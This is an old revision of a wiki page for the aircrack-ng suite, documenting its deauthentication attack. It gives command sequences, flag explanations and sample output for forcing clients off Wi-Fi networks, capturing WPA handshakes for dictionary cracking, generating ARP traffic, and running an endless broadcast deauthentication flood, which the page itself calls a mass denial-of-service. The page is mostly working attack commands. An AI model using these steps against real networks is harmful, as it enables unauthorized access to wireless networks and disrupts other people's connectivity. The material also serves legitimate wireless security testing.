This is an old revision of the document!
Table of Contents
Deauthentication
Usage
- Recovering a hidden (not broadcasted) ESSID
- Capturing WPA handshakes by forcing clients to reauthenticate
- Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless clients.
It is usually more effective to target a specific station using the -c parameter.
WPA Handshake capture with an Atheros
airmon-ng start ath0 airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console) aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds) aircrack-ng -w /path/to/dictionary out.cap
Here the explaination of the above commands:
airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0 Where:
- -c 6 is the channel to listen on
- –bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
- -w out is the file prefix of the file name to be written
- ath0 is the interface name
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 Where:
- -0 means deauthentication attack
- 5 is number of groups of deauthentication packets to send out
- -a 00:14:6C:7E:40:80 is MAC address of the access point
- -c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated
- ath0 is the interface name
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
ARP request generation with a Prism2 card
airmon-ng start wlan0 airodump-ng -c 6 -w out wlan0 (switch to another console) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type) otherwise the card won't be correctly setup for injection.
Mass denial-of-service with a RT2500 card
airmon-ng start ra0 aireplay-ng -0 0 -a 00:13:10:30:24:9C ra0
With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmwares ignore deauthentications sent to broadcasts, so you need to send them directly to them using the -c option as described above.